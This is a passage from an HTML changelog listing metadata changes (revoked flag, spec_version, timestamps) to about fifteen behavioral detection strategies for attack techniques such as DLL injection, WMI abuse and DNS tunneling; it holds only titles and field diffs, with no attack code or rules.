collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0503] Behavioral Detection Strategy for Exfiltration Over Symmetric Encrypted Non-C2 Protocol</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0376] Behavioral Detection Strategy for Network Service Discovery Across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.683000+00:00</td></tr></tbody></table></details><hr><h4>[DET0269] Behavioral Detection Strategy for Remote Service Logins and Post-Access Activity</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0221] Behavioral Detection Strategy for T1123 Audio Capture Across Windows, Linux, macOS</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.692000+00:00</td></tr></tbody></table></details><hr><h4>[DET0338] Behavioral Detection Strategy for Use Alternate Authentication Material (T1550)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.673000+00:00</td></tr></tbody></table></details><hr><h4>[DET0185] Behavioral Detection Strategy for Use Alternate Authentication Material: Application Access Token (T1550.001)</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.688000+00:00</td></tr></tbody></table></details><hr><h4>[DET0364] Behavioral Detection Strategy for WMI Execution Abuse on Windows</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.683000+00:00</td></tr></tbody></table></details><hr><h4>[DET0021] Behavioral Detection for Service Stop across Platforms</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.688000+00:00</td></tr></tbody></table></details><hr><h4>[DET0329] Behavioral Detection for T1490 - Inhibit System Recovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.688000+00:00</td></tr></tbody></table></details><hr><h4>[DET0100] Behavioral Detection of Asynchronous Procedure Call (APC) Injection via Remote Thread Queuing</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.676000+00:00</td></tr></tbody></table></details><hr><h4>[DET0142] Behavioral Detection of CLI Abuse on Network Devices</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.692000+00:00</td></tr></tbody></table></details><hr><h4>[DET0251] Behavioral Detection of Cloud Group Enumeration via API and CLI Access</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.678000+00:00</td></tr></tbody></table></details><hr><h4>[DET0165] Behavioral Detection of Command History Clearing</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0516] Behavioral Detection of Command and Scripting Interpreter Abuse</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.683000+00:00</td></tr></tbody></table></details><hr><h4>[DET0389] Behavioral Detection of DLL Injection via Windows API</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0400] Behavioral Detection of DNS Tunneling and Application Layer Abuse</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid 